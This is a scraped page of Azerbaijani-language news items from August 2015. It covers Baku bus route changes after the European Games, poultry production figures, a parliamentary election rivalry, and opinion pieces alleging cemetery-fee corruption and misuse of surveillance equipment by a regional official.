Yaxın günlərdə istiqaməti dəyişdirilmiş və ya tamamilə xəttdən çıxarılmış marşrutlar üzrə yeniliklərin tətbiqi nəzərdə tutulur Bu barədə Trend-ə Nəqliyyat Nazirliyinin İctimaiyyətlə əlaqələr şöbəsindən məlumat verilib.Məlumata görə, Avropa Oyunları ərəfəsində və yarışlar keçirilən zaman avtomobil yollarında yarana biləcək sıxlığın qarşısının alınması və keyfiyyətli nəqliyyat xidmətinin göstərilməsi məqsədi ilə paytaxtda bəzi marşrut xətlərinin istiqaməti dəyişdirilmiş, bir neçəsi isə tamamilə bağlanmışdı.Artıq oyunlar başa çatdığı üçün nazirlik nəqliyyat sisteminin optimallaşdırılması prinsipi ilə bu məsələyə yenidən baxır.Avropa Oyunları ərəfəsində “Baku Bus MMC” tərəfindən paytaxta gətirilən yeni avtobusların şəhərdaxili sərnişindaşıma məqsədi ilə istismara verilməsi planlaşdırılır.Hazırda yeni marşurutların müəyyənləşdirilməsi üçün paytaxtda eyni istiqamət üzrə hərəkət edən marşrut xətlərinin olub-olmaması məsələsi araşdırılır.Xatırladaq ki, Avropa Oyunlarının keçirilməsi ilə əlaqədar iyun ayından Bakıda üç qapılı iri tutumlu avtobusların bəziləri xidmətləri yığışdırılıb, 14 saylı marşrut 24 saylı, 90 saylı avtobus 83 saylı, 86 saylı marşrut 29 saylı marşrutla əvəz olunub. 20, 188, 53 saylı avtobuslar ümumiyyətlə ləğv edilib, 120 saylı avtobusda maşınlar təzələnib, 124 sayl avtobusun hərəkət xətti 20-ci sahəyə qədər uzadılıb. 193 saylı marşrutun şəhərin mərkəzində hərəkət etməsinə icazə verilmir, 70 saylı avtobusun istiqaməti dəyişdirilib, 95 saylı marşrut xəttinin hərəkət istiqaməti “Xətai” metrosuna qədər qısaldılıb.

5 Avqust 2015 1:02

Azərbaycanda quş əti ilə təminat maksimal həddə çatıb

bb90a20c-ae10-4b97-8a7d-a94525d0621e_292

Ölkə intensiv inkişaf sayəsində 98% quş əti, 100% yumurta istehsalı ilə özünü təmin edir Bu gün Bakıda keçirilən Beynəlxalq Quşçuluq Forumu çərçivəsində Azərbaycan Sahibkarlar Konfederasiyası (ASK) ilə Beynəlxalq Quşçuluq Forumu (BQF) arasında birgə əməkdaşlıq müqaviləsi imzalanıb. Sənədi ASK prezidenti Məmməd Musayev və BQF-nin sədri Sergey Şabayev imzalayıblar. Sənəd əsasında gələcəkdə iki təşkilat arasında təcrübə mübadiləsi aparmaqla, bu sahədə analitik məlumatların hazırlanması, müasir avadanlıqların əldə edilməsi ilə bağlı əməkdaşlıq həyata keçiriləcək. *** Azərbaycanda quşçuluq sahəsi son 15 ildə sürətlə inkişaf edir. Ölkədə istehsal olunan yüksək keyfiyyətli quş əti daxili tələbatı ödəməklə yanaşı, xarici ölkələrə də ixrac potensialı da yaradıb. Ölkə intensiv inkişaf sayəsində 98% quş əti, 100% yumurta istehsalı ilə özünü təmin edir. "Report"un məlumatına görə, qeyd edilənlər bu gün Bakıda keçirilən Beynəlxalq Quşçuluq Forumunda bildirilib. Tədbirdə əlavə olunub ki, sənaye quşçuluğunda illik istehsal 100 min ton təşkil edib. Quş əti istehsalı 2010-cu illə müqayisədə 1,5 dəfə artıb və 2014-cü ildə 99,4 min ton, sənaye üsulu ilə 64,1 min ton, yumurta istehsalı isə qeyd edilən dövrdə 1,3 dəfə artaraq 1,6 mlrd. ədəd təşkil edib. Forumda bildirilib ki, hazırda quş ətinin ixracı üçün xarici bazarlar axtarılır, ilkin olaraq əsasən MDB ölkələrinə tədarükün həyata keçirilməsi nəzərdə tutulub. Tədbirdə çıxış edən Kənd Təsərrüfatı Nazirliyi heyvandarlığın inkişafı şöbəsinin müdiri Qalib Əbdüləliyev qeyd edib ki, ölkədə ilk dəfədir kənd təsərrüfatı sahələri arasında quşçuluq daxili tələbatı ödəməklə yanaşı, xaricə ixrac imkanı da yaradıb. Q.Əbdüləliyev bu sahəsinin əsas problemlərinə toxunaraq bildirib ki, quşçuluqda əsas çətinliklərdən biri hazırda yem təhcizatı ilə bağlıdır. Şöbə müdiri yem istehsalında problemlərin olduğunu vurğulayıb.

5 Avqust 2015 11:06

Rüstəm Xəlilov üçün yolun sonu göründü

70177

Parlament seçkilərindən bizi üç aylıq zaman kəsimi ayırır Seçkilər yaxınlaşdıqca həm hazırda Milli Məclisdə təmsil olunan deputatlar, həm də gücünü sınamaq istəyən namizədlər seçki hazırlığına start verməyə başlayıblar.Xüsusən parlamentdə təmsilçiliyi dövründə heç bir aktivlik göstərməyən, seçiciləri və ictimaiyyətlə təmasdan yayınan deputatların yeri uğrunda mübarizə qızışır.Millət vəkilliyinə iddia edən şəxslər passiv deputatların seçicilərdən dəstək almayacağına əmin olub, öz namizədliyini onların dairələrindən irəli sürməyə həvəsli görünürlər.Editor.az-a daxil olan məlumatda bildirilir ki, Milli Məclisin susqun üzvləri siyahısında yer alan deputat Rüstəm Xəlilov bu seçkilərdə ciddi namizədlərlə üz-üzə gələcək. Namizədlərdən ən ciddisi isə Azərbaycan Meliorasiya və Su Təsərrüfatı Açıq Səhmdar Cəmiyyətinin sədr müavini Zakir Quliyevdir.Mənbə iddia edir ki, Sabirabad rayonunda anadan olan Zakir Quliyev rayonda nüfuzlu adamdır və onun seçilməsi tamamilə realdır: “Rüstəm Xəlilov deputat seçiləndən bugünə qədər bir dəfə olsun seçicilərlə görüş keçirməyib. Onların problemləri ilə maraqlanmayıb. Digər yandan Milli Məclisdə aktiv fəaliyyət göstərməyib. Bu səbəbdən onun deputat seçilmək şansı yox səviyyəsindədir. Amma buna baxmayaraq, o, hər yerdə yenidən deputat olacağını bəyan edir. Amma bu dəfə deyəsən “Çətin yerdə axşamlayıb”. Azərbaycan Meliorasiya və Su Təsərrüfatı Açıq Səhmdar Cəmiyyətinin sədr müavini, əslən sabirabadlı olan Zakir Quliyev Rüstəm Xəlilova rəqib kimi seçkilərdə iştirak etməyə qərar verib. Özü də onun bu seçimi təsadüfi deyil və Azərbaycan Meliorasiya və Su Təsərrüfatı Açıq Səhmdar Cəmiyyətinin sədri Əhməd Əhmədzadə tərəfindən dəstəklənir”. Xatırladaq ki, Rüstəm Xəlilov artıq II çağırışdır 64 saylı Sabirabad II Seçki Dairəsindən deputatdır və Milli Məclisin susqun deputatları siyahısında yer alır.

4 Avqust 2015 4:31

“Qəbiristanlıq korrupsiyası”

скачанные файлы

Dövlət rüsumu 63 manat olan qəbir yerləri niyə 500-1000 manata satılır? Azərbaycan “həqiqətlər”ini yazıb qurtarmaq mümkün deyil. Bütün sahələrdə əndrabadi proseslər gedir. Hökumətimiz nəinki daşdan, ölüdən də pul çıxarır. Bəli, Azərbaycan yeganə ölkədir ki, burada qəbiristanlıq korrupsiyası var. Doğmasını itirmiş adamlar 500-1000 manat, bəzən daha çox pul ödəməlidir ki, cəsəd yerdə qalmasın. Təbii ki, bu biabırçı mənzərədə Dini Qurumlar üzrə Dövlət Komitəsinin, Qafqaz Müsəlmanları Idarəsinin də məsuliyyəti var. Bu qurumlar həyəcan təbli çalıb insanların ölümünü alver predmetinə çevirənləri ifşa edə bilərlər. Amma Azərbaycanda heç bir orqan müstəqil deyil və bütün sahələr Prezident Aparatına zəncirlənib. Əgər hökumətin iradəsi olsa, bu məsələ dərhal həllini tapar. Amma “qəbiristanlıq biznesi” gəlirli sahədir və hər il milyonlarla vəsaitin ciblərə axmasını təmin edir. Azərbaycanda qəbir yerlərinin AZAL-ın biletləri kimi uçması heç kimə sirr deyil. Amma Bakı Şəhər Əhaliyə Vətəndaşlıq Xidməti Trestinin baş mühəndisi Sabir Həsənov deyib ki, qəbir yerləri üçün pul tələb olunmur: “63 manat dövlət rüsumu var. Ölüsünü dəfn etmək istəyən azərbaycanlıdırsa, dövlət rüsumu 63, xarici vətəndaşdırsa 79 manatdır. Yəni hər kəs rüsumu ödəyərək ölüsünü dəfn edə bilər. Bundan başqa heç bir vəsait tələb olunmur. Bura qəbirin qazılması da daxildir. ”Yer pulu" deyəndə isə diqqətinizə çatdırım ki, torpaq pullu deyil"- deyə Sabir Həsənov bildirib. Bu adamlara xatırlatmaq lazımdır ki, Azərbaycan vətəndaşları ölümsüz deyil. Yəni hamının yaxınları, qonşuları rəhmətə gedir və hamı da qəbiristanlıqlarla məcburi əlaqədə olur. Ölü yeyəsi deyir ki, 1000 manat ödəmişəm, rəsmi şəxslər deyir ki, 63 manatdır. Bu ölkədə dövlət rüsumları çoxdandır rəhmətə gedib. Ona görə əhalinin 90 faizi bu rüsumlar haqqında məlumatlı deyil. Indi dövlət rüsumlarını hökumət rüsumları əvəz edir. Bu ölkədə bütün xidmətlər dövlətin təyin etdiyi məbləğdən 10-15 dəfə baha başa gəlir. Sanki ölüdən də, ölmüş şəxsin ailəsindən də qisas alırlar. Axı qəbir yerlərinin 500-1000 manata satılması həm də əxlaq məsələsidir. Necə olur ki, hökumət özünə sərf edən məsələləri dərhal həll edə bilir, amma vətəndaşı təqib edən problemlərə göz yumur? Ağır vəziyətdə olan vətəndaşa kömək etmək əvəzinə, ikinci zərbəni vururlar. Bakıda bütün qəbiristanlıq ərazilərinin öz qiyməti var. Qəbiristanlığı “ölülər hoteli” kimi istifadə edirlər. Dünyasını dəyişənlər məcburi “putyovka” almalıdır. Bir daha təsdiq olunur ki, bu ölkədə dirilərlə yanaşı ölülər də təhqir olunur. Öləndən sonra da insanları ağır xərclər dinc buraxmır. Qəbiristanlıq yerlərinin satılmasından milyonlarla pul qazananlar kimlərdi? Təbii ki, iri məmurlar. Həm də ölü biznesi heç vaxt ölməyən biznes növüdür. Ölkə başçısı çıxışlarında deyir ki, mətbuatı izləyir. Yaxşı olar ki, bu məqaləni də oxusun və ölülərə qarşı qiyamdan xəbər tutsun. Vətəndaşa pul kimi baxmaq anti-insani xarakterdi. Heç olmasa ölülərdən qazanc ummayın. Akif

4 Avqust 2015 8:30

Raqub Məmmədov vəzifə üçün ermənilərin əlinə hansı «kozırı» verib?

1438583203_raq

Ağdamın indiki icra başçısı sabiq rayon rəhbəri Nizami Sadıqovun qumar oynaması xəbərini gündəmə gətirməklə ölkəmizi düşmən mətbuatının dilinə salıb Hələ bir müddət əvvəl xəbər vermişdik ki, Ağdamın icra başçısı Raqub Məmmədov sələfi Nizami Sadıqovu devirmək üçün təkcə özünün imkanlarından deyil, həmçinin onu etibar edilmiş vəzifəsindən sui-istifadə edib. JAM.AZ-a verilən məlumata görə, qalmaqala səbəb olmuş, hətta erməni mətbuatının mövzu ilə bağlı tirajladığı həmin xəbər isə Nizami Sadıqovun qumar oynaması ilə bağlıydı. Qeyd edək ki, Ağdamın sabiq icra başçısının qumar oynadığı və bir çox məmurlarla bu işi təşkil etdiyinə dair xəbər sonda onun vəzifəsindən getməsinə səbəb oldu. Həmin vaxt Sadıqov mətbuata açıqlama verərək, qumar oynamadığını deməklə yanaşı, həm də bus öz-söhbətin artıq ermənilər tərəfindən tirajlandığını bildirmişdi. Onun bu açıqlamasına rəğmən, işin təfərrüatının fərqli olduğu tam aydın idi. Və zaman içində məlum oldu ki, məsələ ustalıqla deyil, qeyri-peşəkarcasına təşkil olunub. JAM.AZ-ın araşdırması nəticəsində məlum olub ki, Nizami Sadıqovun qumar oynaması haqqında məlumatlar həmin vaxt Tərtər MTN-ə rəhbərlik edən Raqub Məmmədov tərəfindən dövriyyəyə buraxılıb. Polkovnik Məmmədovun bu məlumatları hansı məqsədlə dövriyyəyə buraxdırdığı sirr deyil. Çünki yekun nəticədə Sadıqovun yerinə özünün icra başçısı olmasını təmin etməyə nail olub. Əldə etdiyimiz məlumata görə, icra başçısı olmaq üçün çalışan Raqub Məmmədov Nizami Sadıqovun müavinlərindən birini öz tərəfinə çəkərək, ona bir xeyli vədlər verib. Bunun ardından isə Tərtər MTN-nin balansında olan xüsusi dinləmə və çəkiliş üçün nəzərdə tutulmuş avadanlıqlardan yararlanıb. Və həmin müavin görüntülər ala bilən cihazla təhciz edildikdən sonra Nizami Sadıqovun keçirdiyi rəsmi və qeyri rəsmi görüşlərə qatılıb. Nəticədə, ip ucları tapılıb və Sadıqovun işdən çıxarılması üçün zəruri olan bütün dosye lazımi qurumlara təqdim edilib. Amma Raqub Məmmədovun buradakı səhvlərinin sayı həddindən artıq çoxdur. Birincisi, keçmiş polkovnikə Tərtər rayonunda Azərbaycan dövləti və dövlətçiliyinin təhlükəsizliyini təmin etmək tapşırılıb. Bu ayrı məsələdir ki, Tərtər rayonunda bu işlər hansı səviyyədə təşkil olunub. İkincisi, Raqub Məmmədov cəbhə xəttində yerləşən bir rayonun təhlükəsizliyinə cavabdeh şəxs olub və onun ixtiyarına verilmiş texniki avadanlıq və cihazlardan yalnız təyinatı üzrə istifadə oluna bilərdi. Onun başqa bir rayonun icra başçısını pusması, izləməsi qanunla yol verilməyən hərəkət olmaqla yanaşı, həm də onun səlahiyyətində olan məsələ deyildi. Üstəlik, heç bir tapşırıq olmadan belə bir addım atması MTN polkonikinə yaraşan hal da deyil. Üçüncüsü, Raqub Məmmədov ərazisinin 2/3-si işğal altında olan Ağdam rayonunun icra başçısı haqqında belə məlumatları yaymaqla və ya mətbuata çıxarmaqla ciddi qanun pozuntusuna yol verib. Üstəlik, ermənilərin də əlinə Azərbaycan iqtidarını tənqid etməyə imkanlar yaradıb. Təbii ki, Nizami Sadıqovun qumar oynaması yaxşı hal deyil və bu barədə məlumat olduğu halda onun araşdırılması və müəyyən edilməsi pis bir nəticə deyil. Lakin bir şərtlə ki, bu barədə mümkün dəlil və sübutlar lazımi qurumlara təqdim olunmaqla, səssiz şəkildə həllini tapmalıydı. Daha Raqub Məmmədov kimi, onu bütün dünyaya çatdırmaqla deyil. P.S. İstər Müdafiə Nazirliyi, istərsə də Prezident Admnistrasiyası mütəmadi olaraq ölkə mətbuatının nümayəndələrinə xəbərdarlıq edir ki, cəbhə xəttində yerləşən rayonlar, Azərbaycan Ordusu ilə bağlı məlumatlar yayarkən diqqətli olsunlar. Bunu belə əsaslandırırlar ki, hər hansı bir yanlış məlumat sonda Azərbaycan dövlətinə qarşı çevrilir və düşmən bundan təxribat törətmək üçün istifadə edir. Təbii ki, biz mətbuat orqanı olaraq durumun ciddiyyətinin fərqindəyik. Üstəlik, dövlət qurumlarının tövsiyyələrinə riyayət etməyə çalışırıq. Amma həmin dövlət qurumları cəbhə xəttində yerləşən bir rayonun rəhbəri haqqında «qumar oynamaq», «eyş-işrət məclisləri təşkil etmək» kimi məlumatları dövriyyəyə buraxan və bununla erməni mətbuatının dilinə düşməyimizə səbəb yaradan vəzifə hərislərini də araşdırsa, yaxşı olar.

3 Avqust 2015 4:52

Fakt

Bizi izləyin